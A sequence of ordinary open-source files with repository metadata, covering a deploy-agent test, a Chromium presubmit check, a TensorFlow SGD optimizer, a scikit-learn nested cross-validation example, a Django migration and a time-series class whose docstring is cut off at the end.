fn = tempfile.mkstemp()[1]
env_status = EnvStatus(fn)
envs = env_status.load_envs()
self.assertEqual(envs, {})
def test_bad_format(self):
fn = tempfile.mkstemp()[1]
contents = '{' \
' "env1": {' \
' "deployId": "1",' \
' "deployStage": 3,'
with open(fn, 'w') as f:
f.write(contents)
env_status = EnvStatus(fn)
envs = env_status.load_envs()
self.assertEqual(envs, {})
os.remove(fn)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "ad03001a78eb476eaa4e569345f7d71c",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 99,
"avg_line_length": 37.25,
"alnum_prop": 0.5913104909925821,
"repo_name": "pinterest/teletraan",
"id": "11ee677eea114a4731aae5845c8a9ae44191c3ca",
"size": "3417",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "deploy-agent/tests/unit/deploy/utils/test_status.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "159647"
},
{
"name": "Dockerfile",
"bytes": "423"
},
{
"name": "HTML",
"bytes": "345697"
},
{
"name": "Java",
"bytes": "1308657"
},
{
"name": "JavaScript",
"bytes": "2580910"
},
{
"name": "Makefile",
"bytes": "185"
},
{
"name": "Python",
"bytes": "770658"
},
{
"name": "Shell",
"bytes": "21356"
}
],
"symlink_target": ""
}
|
"""Top-level presubmit script for services/viz."""
USE_PYTHON3 = True
def CheckChangeOnUpload(input_api, output_api):
import sys
original_sys_path = sys.path
try:
sys.path = sys.path + [input_api.os_path.join(
input_api.change.RepositoryRoot(),
'components', 'viz')]
import presubmit_checks as ps
finally:
# Restore sys.path so the presubmit framework is not left with a
# modified import path after this check runs.
sys.path = original_sys_path
allowlist = (r'^services[\\/]viz[\\/].*\.(cc|h)$',)
return ps.RunAllChecks(input_api, output_api, allowlist)
|
{
"content_hash": "7e70a9de688364e14322e0f495ff839a",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 58,
"avg_line_length": 28.466666666666665,
"alnum_prop": 0.6768149882903981,
"repo_name": "chromium/chromium",
"id": "299e3aaad4ad1b224db47ffe14301dfc1176bd59",
"size": "568",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "services/viz/PRESUBMIT.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Momentum for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.training import training_ops
class SGD(optimizer_v2.OptimizerV2):
"""Stochastic gradient descent optimizer.
Computes:
```
variable -= learning_rate * gradient
```
Some of the args below are hyperparameters, where a hyperparameter is
defined as a scalar Tensor, a regular Python value, or a callable (which
will be evaluated when `apply_gradients` is called) returning a scalar
Tensor or a Python value.
@compatibility(eager)
When eager execution is enabled, learning_rate can be a callable that takes
no arguments and returns the actual value to use. This can be useful for
changing these values across different invocations of optimizer functions.
@end_compatibility
Arguments:
learning_rate: float hyperparameter >= 0. Learning rate.
name: Optional name prefix for the operations created when applying
gradients. Defaults to 'SGD'.
"""
def __init__(self,
learning_rate=0.001,
momentum=None,
nesterov=False,
name="SGD"):
super(SGD, self).__init__(name)
self._set_hyper("learning_rate", learning_rate)
def _apply_dense(self, grad, var):
return training_ops.apply_gradient_descent(
var,
math_ops.cast(self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad,
use_locking=self._use_locking).op
def _resource_apply_dense(self, grad, var):
return training_ops.resource_apply_gradient_descent(
var.handle,
math_ops.cast(self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad,
use_locking=self._use_locking)
def _resource_apply_sparse_duplicate_indices(self, grad, handle, indices):
return resource_variable_ops.resource_scatter_add(
handle.handle, indices, -grad * self._get_hyper("learning_rate"))
def _apply_sparse_duplicate_indices(self, grad, var):
delta = ops.IndexedSlices(
grad.values * math_ops.cast(
self._get_hyper("learning_rate"), var.dtype.base_dtype),
grad.indices, grad.dense_shape)
return var.scatter_sub(delta, use_locking=self._use_locking)
def get_config(self):
config = super(SGD, self).get_config()
config.update({
"learning_rate": self._serialize_hyperparameter("learning_rate"),
})
return config
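# Illustrative usage sketch (assumes eager execution and the minimize() API
# of this optimizer_v2 snapshot; not part of the original file):
#
#     opt = SGD(learning_rate=0.1)
#     var = resource_variable_ops.ResourceVariable(1.0)
#     loss = lambda: (var - 3.0) ** 2      # minimized at var == 3.0
#     opt.minimize(loss, var_list=[var])   # one gradient-descent step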
|
{
"content_hash": "7fc30f2da8ab379b89e39b0b09be93ff",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 34.87012987012987,
"alnum_prop": 0.6919925512104284,
"repo_name": "alshedivat/tensorflow",
"id": "e26c82279f580f9f544b5f475ff3a945c73e35bd",
"size": "3374",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/keras/optimizer_v2/gradient_descent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "439824"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50398044"
},
{
"name": "CMake",
"bytes": "199209"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1276639"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "871083"
},
{
"name": "Jupyter Notebook",
"bytes": "2604347"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "61311"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40038696"
},
{
"name": "RobotFramework",
"bytes": "890"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "486609"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
}
|
baggage_key = 'crossdock-baggage-key'
|
{
"content_hash": "fab64840c0a9d9bea51fbc5d1b20f3dd",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 37,
"avg_line_length": 38,
"alnum_prop": 0.7631578947368421,
"repo_name": "guillermo-sentinella/jaeger-client-python",
"id": "d6da9ff0a40bef847766ffa6c6d5c38c24d5144a",
"size": "38",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "crossdock/server/constants.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "3725"
},
{
"name": "Python",
"bytes": "225177"
}
],
"symlink_target": ""
}
|
"""
=========================================
Nested versus non-nested cross-validation
=========================================
This example compares non-nested and nested cross-validation strategies on a
classifier of the iris data set. Nested cross-validation (CV) is often used to
train a model in which hyperparameters also need to be optimized. Nested CV
estimates the generalization error of the underlying model and its
(hyper)parameter search. Choosing the parameters that maximize non-nested CV
biases the model to the dataset, yielding an overly-optimistic score.
Model selection without nested CV uses the same data to tune model parameters
and evaluate model performance. Information may thus "leak" into the model
and overfit the data. The magnitude of this effect is primarily dependent on
the size of the dataset and the stability of the model. See Cawley and Talbot
[1]_ for an analysis of these issues.
To avoid this problem, nested CV effectively uses a series of
train/validation/test set splits. In the inner loop (here executed by
:class:`GridSearchCV <sklearn.model_selection.GridSearchCV>`), the score is
approximately maximized by fitting a model to each training set, and then
directly maximized in selecting (hyper)parameters over the validation set. In
the outer loop (here in :func:`cross_val_score
<sklearn.model_selection.cross_val_score>`), generalization error is estimated
by averaging test set scores over several dataset splits.
The example below uses a support vector classifier with a non-linear kernel to
build a model with optimized hyperparameters by grid search. We compare the
performance of non-nested and nested CV strategies by taking the difference
between their scores.
.. topic:: See Also:
- :ref:`cross_validation`
- :ref:`grid_search`
.. topic:: References:
.. [1] `Cawley, G.C.; Talbot, N.L.C. On over-fitting in model selection and
subsequent selection bias in performance evaluation.
J. Mach. Learn. Res 2010,11, 2079-2107.
<http://jmlr.csail.mit.edu/papers/volume11/cawley10a/cawley10a.pdf>`_
"""
from sklearn.datasets import load_iris
from matplotlib import pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV, cross_val_score, KFold
import numpy as np
print(__doc__)
# Number of random trials
NUM_TRIALS = 30
# Load the dataset
iris = load_iris()
X_iris = iris.data
y_iris = iris.target
# Set up possible values of parameters to optimize over
p_grid = {"C": [1, 10, 100],
"gamma": [.01, .1]}
# We will use a Support Vector Classifier with "rbf" kernel
svm = SVC(kernel="rbf")
# Arrays to store scores
non_nested_scores = np.zeros(NUM_TRIALS)
nested_scores = np.zeros(NUM_TRIALS)
# Loop for each trial
for i in range(NUM_TRIALS):
# Choose cross-validation techniques for the inner and outer loops,
# independently of the dataset.
# E.g "GroupKFold", "LeaveOneOut", "LeaveOneGroupOut", etc.
inner_cv = KFold(n_splits=4, shuffle=True, random_state=i)
outer_cv = KFold(n_splits=4, shuffle=True, random_state=i)
# Non_nested parameter search and scoring
clf = GridSearchCV(estimator=svm, param_grid=p_grid, cv=inner_cv)
clf.fit(X_iris, y_iris)
non_nested_scores[i] = clf.best_score_
# Nested CV with parameter optimization
nested_score = cross_val_score(clf, X=X_iris, y=y_iris, cv=outer_cv)
nested_scores[i] = nested_score.mean()
score_difference = non_nested_scores - nested_scores
print("Average difference of {0:6f} with std. dev. of {1:6f}."
.format(score_difference.mean(), score_difference.std()))
# Plot scores on each trial for nested and non-nested CV
plt.figure()
plt.subplot(211)
non_nested_scores_line, = plt.plot(non_nested_scores, color='r')
nested_line, = plt.plot(nested_scores, color='b')
plt.ylabel("score", fontsize="14")
plt.legend([non_nested_scores_line, nested_line],
["Non-Nested CV", "Nested CV"],
bbox_to_anchor=(0, .4, .5, 0))
plt.title("Non-Nested and Nested Cross Validation on Iris Dataset",
x=.5, y=1.1, fontsize="15")
# Plot bar chart of the difference.
plt.subplot(212)
difference_plot = plt.bar(range(NUM_TRIALS), score_difference)
plt.xlabel("Individual Trial #")
plt.legend([difference_plot],
["Non-Nested CV - Nested CV Score"],
bbox_to_anchor=(0, 1, .8, 0))
plt.ylabel("score difference", fontsize="14")
plt.show()
|
{
"content_hash": "3321336fd4a7066e05620544fef76b27",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 79,
"avg_line_length": 37.73504273504273,
"alnum_prop": 0.716647791619479,
"repo_name": "vortex-ape/scikit-learn",
"id": "b40dc91fc4d8f645560e83ad0293a8f9106e0bff",
"size": "4415",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "examples/model_selection/plot_nested_cross_validation_iris.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6351428"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
}
|
import ga, Matrix, Ann, copy, random
## initialise the GA
oga = ga.ga()
oga.seedGA(5, 20, 5, 4)
for p in oga.getPopulation():
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
pop = oga.getPopulation()
newPop = []
for n in range(5):
newPop.append(copy.deepcopy(pop[0]))
currVal = newPop[n]["second_thresholds"].getElem(1, 0)
currVal += (0.1 - random.random()*0.2)
newPop[n]["second_thresholds"].setElem(1, 0, currVal)
print("New Pop")
for p in newPop:
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
## now test the roulette process
roulettePop = oga.roulette([1,1,1,1,1])
print("Roulette Pop")
for p in roulettePop:
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
## Finally, test the mutation...
mga = ga.ga()
mga.setGA(roulettePop)
mga.mutatePopulation(roulettePop, 0.1, 1)
print("Mutated Pop")
for p in mga.getPopulation():
print(p["second_thresholds"])
print(p["second_thresholds"].renderT())
|
{
"content_hash": "3b16ac8f28edd287a024cba80be7d5a6",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 55,
"avg_line_length": 22.40909090909091,
"alnum_prop": 0.6906693711967545,
"repo_name": "bluemini/agenetic",
"id": "14b70d4b7305d1499daa04196269cdc5ceb477e6",
"size": "2559",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_matrix_copy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "37648"
}
],
"symlink_target": ""
}
|
from geopy.point import Point
from geopy.location import Location
from geopy import geocoders
VERSION = (0, 95, 1)
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3:]:
version = '%s.%s' % (version, VERSION[3])
return version
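# Worked example (not in the original file): with VERSION = (0, 95, 1),
# VERSION[2] is truthy and VERSION[3:] is empty, so get_version() builds
# "0.95" and then returns "0.95.1".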
|
{
"content_hash": "1a1ffc7e1b9ba49aa63d0846a5288d20",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 49,
"avg_line_length": 26.384615384615383,
"alnum_prop": 0.6122448979591837,
"repo_name": "AdaptiveApplications/carnegie",
"id": "dc4b80aaf978e9d58d33ca32f39a073afa788f90",
"size": "343",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "tarc_bus_locator_client/geopy-0.95.1/geopy/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4023"
},
{
"name": "C",
"bytes": "20612685"
},
{
"name": "C++",
"bytes": "7216064"
},
{
"name": "CMake",
"bytes": "18586"
},
{
"name": "CSS",
"bytes": "216171"
},
{
"name": "Emacs Lisp",
"bytes": "7798"
},
{
"name": "Fortran",
"bytes": "7795"
},
{
"name": "HTML",
"bytes": "12999"
},
{
"name": "Java",
"bytes": "1341804"
},
{
"name": "JavaScript",
"bytes": "20474"
},
{
"name": "M4",
"bytes": "45508"
},
{
"name": "Makefile",
"bytes": "932812"
},
{
"name": "PureBasic",
"bytes": "165856"
},
{
"name": "Python",
"bytes": "11658962"
},
{
"name": "Roff",
"bytes": "5923"
},
{
"name": "Shell",
"bytes": "1442066"
},
{
"name": "Vim script",
"bytes": "3731"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
# Implements the blaze.eval function
from .air import prepare, interps
from .. import array
#------------------------------------------------------------------------
# Eval
#------------------------------------------------------------------------
def eval(arr, storage=None, caps={'efficient-write': True}, out=None,
strategy=None):
"""Evaluates a deferred blaze kernel tree
data descriptor into a concrete array.
If the array is already concrete, merely
returns it unchanged.
Parameters
----------
storage: blaze.Storage, optional
Where to store the result, if evaluating to a BLZ
output or (in the future) to a distributed array.
caps: { str : object }
Capabilities for evaluation and storage
TODO: elaborate on values
out: Array
Output array to store the result in, or None for a new array
strategy: str
Evaluation strategy.
Currently supported: 'py', 'jit'
"""
strategy = strategy or arr._data.strategy
if arr._data.capabilities.deferred:
result = eval_deferred(arr, storage, caps, out, strategy)
elif arr._data.capabilities.remote:
# Retrieve the data to local memory
# TODO: Caching should play a role here.
result = array(arr._data.dynd_arr())
else:
# TODO: This isn't right if the storage is different; a copy is
# required in that case.
result = arr
return result
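# Illustrative sketch (not in the original file): for a deferred expression
# built from blaze arrays, e.g.
#
#     result = eval(a + b, strategy='jit')   # force evaluation via the JIT
#
# a concrete array comes back; concrete inputs pass through unchanged.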
def eval_deferred(arr, storage, caps, out, strategy):
expr = arr._data.expr
graph, ctx = expr
# Construct and transform AIR
func, env = prepare(expr, strategy)
# Find evaluator
interp = interps.lookup_interp(strategy)
# Interpreter-specific compilation/assembly
func, env = interp.compile(func, env)
# Run with collected 'params' from the expression
args = [ctx.terms[param] for param in ctx.params]
result = interp.interpret(func, env, args=args, storage=storage,
caps=caps, out=out, strategy=strategy)
return result
#------------------------------------------------------------------------
# Append
#------------------------------------------------------------------------
def append(arr, values):
"""Append a list of values."""
# XXX If efficient appends are not supported, this should raise
# a `PerformanceWarning`
if hasattr(arr._data, 'append'):
arr._data.append(values)
else:
raise NotImplementedError('append is not implemented for this '
'object')
|
{
"content_hash": "2f3dace5ade5aa11e6fca578191e5de7",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 73,
"avg_line_length": 31.416666666666668,
"alnum_prop": 0.5695339143615006,
"repo_name": "zeeshanali/blaze",
"id": "a5b57f2818b12f41286a7e324e1fb82613f3b216",
"size": "2639",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blaze/compute/eval.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0087_auto_20220810_1647'),
]
operations = [
migrations.AddField(
model_name='tieredbenefit',
name='display_label',
field=models.CharField(blank=True, default='', help_text='If populated, this will be displayed instead of the quantity value.', max_length=32),
),
migrations.AddField(
model_name='tieredbenefitconfiguration',
name='display_label',
field=models.CharField(blank=True, default='', help_text='If populated, this will be displayed instead of the quantity value.', max_length=32),
),
]
|
{
"content_hash": "4dacf8d98a712e3d7de05ee20bff843d",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 155,
"avg_line_length": 35.142857142857146,
"alnum_prop": 0.6260162601626016,
"repo_name": "python/pythondotorg",
"id": "f0203331baa6d5733fdbc9755e8681432d2d32b0",
"size": "788",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sponsors/migrations/0088_auto_20220810_1655.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7686"
},
{
"name": "Dockerfile",
"bytes": "229"
},
{
"name": "HTML",
"bytes": "498813"
},
{
"name": "JavaScript",
"bytes": "24050"
},
{
"name": "Makefile",
"bytes": "1615"
},
{
"name": "PostScript",
"bytes": "19072"
},
{
"name": "Procfile",
"bytes": "105"
},
{
"name": "Python",
"bytes": "1145343"
},
{
"name": "Ruby",
"bytes": "1464"
},
{
"name": "SCSS",
"bytes": "198033"
}
],
"symlink_target": ""
}
|
from multi import MultiRecipientElement
|
{
"content_hash": "aa72ad627e5dd7b9e669814b81221290",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 39,
"avg_line_length": 40,
"alnum_prop": 0.9,
"repo_name": "schristakidis/p2ner",
"id": "da1bc73a435e31dd05f004c78351aefb58bb8c78",
"size": "683",
"binary": false,
"copies": "1",
"ref": "refs/heads/development",
"path": "p2ner/components/pipeelement/multirecipientelement/multirecipientelement/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "303"
},
{
"name": "Python",
"bytes": "1319300"
}
],
"symlink_target": ""
}
|
"""A class for manipulating time series based on measurements at
unevenly-spaced times, see:
http://en.wikipedia.org/wiki/Unevenly_spaced_time_series
"""
import csv
import datetime
import itertools
import pprint
from queue import PriorityQueue
import sortedcontainers
from dateutil.parser import parse as date_parse
from infinity import inf
from . import histogram, operations, utils, plot
class TimeSeries(object):
"""A class to help manipulate and analyze time series that are the
result of taking measurements at irregular points in time. For
example, here would be a simple time series that starts at 8am and
goes to 9:59am:
>>> ts = TimeSeries()
>>> ts['8:00am'] = 0
>>> ts['8:47am'] = 1
>>> ts['8:51am'] = 0
>>> ts['9:15am'] = 1
>>> ts['9:59am'] = 0
The value of the time series is the last recorded measurement: for
example, at 8:05am the value is 0 and at 8:48am the value is 1. So:
>>> ts['8:05am']
0
>>> ts['8:48am']
1
There are also a bunch of things for operating on another time
series: sums, difference, logical operators and such.
"""
def __init__(self, data=None, default=None):
self._d = sortedcontainers.SortedDict(data)
self.default = default
self.getter_functions = {
"previous": self._get_previous,
"linear": self._get_linear_interpolate,
}
def __getstate__(self):
return {
"data": self.items(),
"default": self.default,
}
def __setstate__(self, state):
self.__init__(**state)
def __iter__(self):
"""Iterate over sorted (time, value) pairs."""
return iter(self._d.items())
def __bool__(self):
return bool(self._d)
def is_empty(self):
return len(self) == 0
@property
def default(self):
"""Return the default value of the time series."""
return self._default
@default.setter
def default(self, value):
"""Set the default value of the time series."""
self._default = value
def _get_linear_interpolate(self, time):
right_index = self._d.bisect_right(time)
left_index = right_index - 1
if left_index < 0:
return self.default
elif right_index == len(self._d):
# right of last measurement
return self.last_item()[1]
else:
left_time, left_value = self._d.peekitem(left_index)
right_time, right_value = self._d.peekitem(right_index)
dt_interval = right_time - left_time
dt_start = time - left_time
if isinstance(dt_interval, datetime.timedelta):
dt_interval = dt_interval.total_seconds()
dt_start = dt_start.total_seconds()
slope = float(right_value - left_value) / dt_interval
value = slope * dt_start + left_value
return value
def _get_previous(self, time):
right_index = self._d.bisect_right(time)
left_index = right_index - 1
if right_index > 0:
_, left_value = self._d.peekitem(left_index)
return left_value
elif right_index == 0:
return self.default
else:
msg = (
"self._d.bisect_right({}) returned a negative value. "
"""This "can't" happen: please file an issue at """
"https://github.com/datascopeanalytics/traces/issues"
).format(time)
raise ValueError(msg)
def get(self, time, interpolate="previous"):
"""Get the value of the time series, even in-between measured values.
"""
try:
getter = self.getter_functions[interpolate]
except KeyError:
msg = (
"unknown value '{}' for interpolate, "
"valid values are in [{}]"
).format(interpolate, ", ".join(self.getter_functions))
raise ValueError(msg)
else:
return getter(time)
def get_item_by_index(self, index):
"""Get the (t, value) pair of the time series by index."""
return self._d.peekitem(index)
def last_item(self):
"""Returns the last (time, value) pair of the time series."""
return self.get_item_by_index(-1)
def last_key(self):
"""Returns the last time recorded in the time series"""
return self.last_item()[0]
def last_value(self):
"""Returns the last recorded value in the time series"""
return self.last_item()[1]
def first_item(self):
"""Returns the first (time, value) pair of the time series."""
return self.get_item_by_index(0)
def first_key(self):
"""Returns the first time recorded in the time series"""
return self.first_item()[0]
def first_value(self):
"""Returns the first recorded value in the time series"""
return self.first_item()[1]
def set(self, time, value, compact=False):
"""Set the value for the time series. If compact is True, only set the
value if it's different from what it would be anyway.
"""
if (
(len(self) == 0)
or (not compact)
or (compact and self.get(time) != value)
):
self._d[time] = value
def set_interval(self, start, end, value, compact=False):
"""Set the value for the time series on an interval. If compact is
True, only set the value if it's different from what it would
be anyway.
"""
# for each interval to render
for i, (s, e, v) in enumerate(self.iterperiods(start, end)):
# look at all intervals included in the current interval
# (always at least 1)
if i == 0:
# if the first, set initial value to new value of range
self.set(s, value, compact)
else:
# otherwise, remove intermediate key
del self[s]
# finish by setting the end of the interval to the previous value
self.set(end, v, compact)
def compact(self):
"""Convert this instance to a compact version: the value will be the
same at all times, but repeated measurements are discarded.
"""
previous_value = object()
redundant = []
for time, value in self:
if value == previous_value:
redundant.append(time)
previous_value = value
for time in redundant:
del self[time]
def items(self):
"""ts.items() -> list of the (key, value) pairs in ts, as 2-tuples"""
return self._d.items()
def exists(self):
"""returns False when the timeseries has a None value, True
otherwise
"""
result = TimeSeries(default=False if self.default is None else True)
for t, v in self:
result[t] = False if v is None else True
return result
def remove(self, time):
"""Allow removal of measurements from the time series. This throws an
error if the given time is not actually a measurement point.
"""
try:
del self._d[time]
except KeyError:
raise KeyError("no measurement at {}".format(time))
def remove_points_from_interval(self, start, end):
"""Allow removal of all points from the time series within a interval
[start:end].
"""
for s, e, v in self.iterperiods(start, end):
try:
del self._d[s]
except KeyError:
pass
def n_measurements(self):
"""Return the number of measurements in the time series."""
return len(self._d)
def __len__(self):
"""Number of points in the TimeSeries."""
return self.n_measurements()
def __repr__(self):
return "<TimeSeries>\n%s\n</TimeSeries>" % pprint.pformat(self._d)
def iterintervals(self, n=2):
"""Iterate over groups of `n` consecutive measurement points in the
time series.
"""
# tee the original iterator into n identical iterators
streams = itertools.tee(iter(self), n)
# advance the "cursor" on each iterator by an increasing
# offset, e.g. if n=3:
#
# [a, b, c, d, e, f, ..., w, x, y, z]
# first cursor --> *
# second cursor --> *
# third cursor --> *
for stream_index, stream in enumerate(streams):
for _ in range(stream_index):
next(stream)
# now, zip the offset streams back together to yield tuples,
# in the n=3 example it would yield:
# (a, b, c), (b, c, d), ..., (w, x, y), (x, y, z)
for intervals in zip(*streams):
yield intervals
@staticmethod
def _value_function(value):
# if value is None, don't filter
if value is None:
def value_function(t0_, t1_, value_):
return True
# if value is a function, use the function to filter
elif callable(value):
value_function = value
# if value is a constant other than None, then filter to
# return only the intervals where the value equals the
# constant
else:
def value_function(t0_, t1_, value_):
return value_ == value
return value_function
def iterperiods(self, start=None, end=None, value=None):
"""This iterates over the periods (optionally, within a given time
span) and yields (interval start, interval end, value) tuples.
TODO: add mask argument here.
"""
start, end, mask = self._check_boundaries(
start, end, allow_infinite=False
)
value_function = self._value_function(value)
# get start index and value
start_index = self._d.bisect_right(start)
if start_index:
_, start_value = self._d.peekitem(start_index - 1)
else:
start_value = self.default
# get last index before end of time span
end_index = self._d.bisect_right(end)
interval_t0, interval_value = start, start_value
for interval_t1 in self._d.islice(start_index, end_index):
if value_function(interval_t0, interval_t1, interval_value):
yield interval_t0, interval_t1, interval_value
# set start point to the end of this interval for next
# iteration
interval_t0 = interval_t1
interval_value = self[interval_t0]
# yield the time, duration, and value of the final period
if interval_t0 < end:
if value_function(interval_t0, end, interval_value):
yield interval_t0, end, interval_value
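# Illustrative sketch (not in the original file):
#
#     ts = TimeSeries(default=0)
#     ts[1], ts[3] = 5, 0
#     list(ts.iterperiods(0, 4))   # [(0, 1, 0), (1, 3, 5), (3, 4, 0)]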
def slice(self, start, end):
"""Return an equivalent TimeSeries that only has points between
`start` and `end` (always starting at `start`)
"""
start, end, mask = self._check_boundaries(
start, end, allow_infinite=True
)
result = TimeSeries(default=self.default)
for t0, t1, value in self.iterperiods(start, end):
result[t0] = value
result[t1] = self[t1]
return result
def _check_regularization(self, start, end, sampling_period=None):
# only do these checks if sampling period is given
if sampling_period is not None:
# cast to both seconds and timedelta for error checking
if isinstance(sampling_period, datetime.timedelta):
sampling_period_seconds = sampling_period.total_seconds()
sampling_period_timedelta = sampling_period
else:
sampling_period_seconds = sampling_period
sampling_period_timedelta = datetime.timedelta(
seconds=sampling_period
)
if sampling_period_seconds <= 0:
msg = "sampling_period must be > 0"
raise ValueError(msg)
if sampling_period_seconds > utils.duration_to_number(end - start):
msg = (
"sampling_period "
"is greater than the duration between "
"start and end."
)
raise ValueError(msg)
if isinstance(start, datetime.date):
sampling_period = sampling_period_timedelta
else:
sampling_period = sampling_period_seconds
return sampling_period
def sample(
self, sampling_period, start=None, end=None, interpolate="previous"
):
"""Sampling at regular time periods.
"""
start, end, mask = self._check_boundaries(start, end)
sampling_period = self._check_regularization(
start, end, sampling_period
)
result = []
current_time = start
while current_time <= end:
value = self.get(current_time, interpolate=interpolate)
result.append((current_time, value))
current_time += sampling_period
return result
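# Illustrative sketch (not in the original file): with measurements at
# t=0 and t=2 and the default "previous" interpolation,
#
#     ts = TimeSeries(default=0)
#     ts[0], ts[2] = 5, 10
#     ts.sample(1, start=0, end=2)   # [(0, 5), (1, 5), (2, 10)]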
def moving_average(
self,
sampling_period,
window_size=None,
start=None,
end=None,
placement="center",
pandas=False,
):
"""Averaging over regular intervals
"""
start, end, mask = self._check_boundaries(start, end)
# default to sampling_period if not given
if window_size is None:
window_size = sampling_period
sampling_period = self._check_regularization(
start, end, sampling_period
)
# convert to datetime if the times are datetimes
full_window = window_size * 1.
half_window = full_window / 2
if isinstance(start, datetime.date) and not isinstance(
full_window, datetime.timedelta
):
half_window = datetime.timedelta(seconds=half_window)
full_window = datetime.timedelta(seconds=full_window)
result = []
current_time = start
while current_time <= end:
if placement == "center":
window_start = current_time - half_window
window_end = current_time + half_window
elif placement == "left":
window_start = current_time
window_end = current_time + full_window
elif placement == "right":
window_start = current_time - full_window
window_end = current_time
else:
msg = 'unknown placement "{}"'.format(placement)
raise ValueError(msg)
# calculate mean over window and add (t, v) tuple to list
try:
mean = self.mean(window_start, window_end)
except TypeError as e:
if "NoneType" in str(e):
mean = None
else:
raise e
result.append((current_time, mean))
current_time += sampling_period
# convert to pandas Series if pandas=True
if pandas:
try:
import pandas as pd
except ImportError:
msg = "can't have pandas=True if pandas is not installed"
raise ImportError(msg)
result = pd.Series(
[v for t, v in result], index=[t for t, v in result],
)
return result
@staticmethod
def rebin(binned, key_function):
result = sortedcontainers.SortedDict()
for bin_start, value in binned.items():
new_bin_start = key_function(bin_start)
try:
result[new_bin_start] += value
except KeyError:
result[new_bin_start] = value
return result
def bin(
self,
unit,
n_units=1,
start=None,
end=None,
mask=None,
smaller=None,
transform="distribution",
):
# return an empty sorted dictionary if there is no time span
if mask is not None and mask.is_empty():
return sortedcontainers.SortedDict()
elif start is not None and start == end:
return sortedcontainers.SortedDict()
# use smaller if available
if smaller:
return self.rebin(
smaller, lambda x: utils.datetime_floor(x, unit, n_units),
)
start, end, mask = self._check_boundaries(start, end, mask=mask)
start = utils.datetime_floor(start, unit=unit, n_units=n_units)
function = getattr(self, transform)
result = sortedcontainers.SortedDict()
dt_range = utils.datetime_range(start, end, unit, n_units=n_units)
for bin_start, bin_end in utils.pairwise(dt_range):
result[bin_start] = function(
bin_start, bin_end, mask=mask, normalized=False
)
return result
def mean(self, start=None, end=None, mask=None, interpolate="previous"):
"""This calculated the average value of the time series over the given
time range from `start` to `end`, when `mask` is truthy.
"""
return self.distribution(
start=start, end=end, mask=mask, interpolate=interpolate
).mean()
def distribution(
self,
start=None,
end=None,
normalized=True,
mask=None,
interpolate="previous",
):
"""Calculate the distribution of values over the given time range from
`start` to `end`.
Args:
start (orderable, optional): The lower time bound of
when to calculate the distribution. By default, the
first time point will be used.
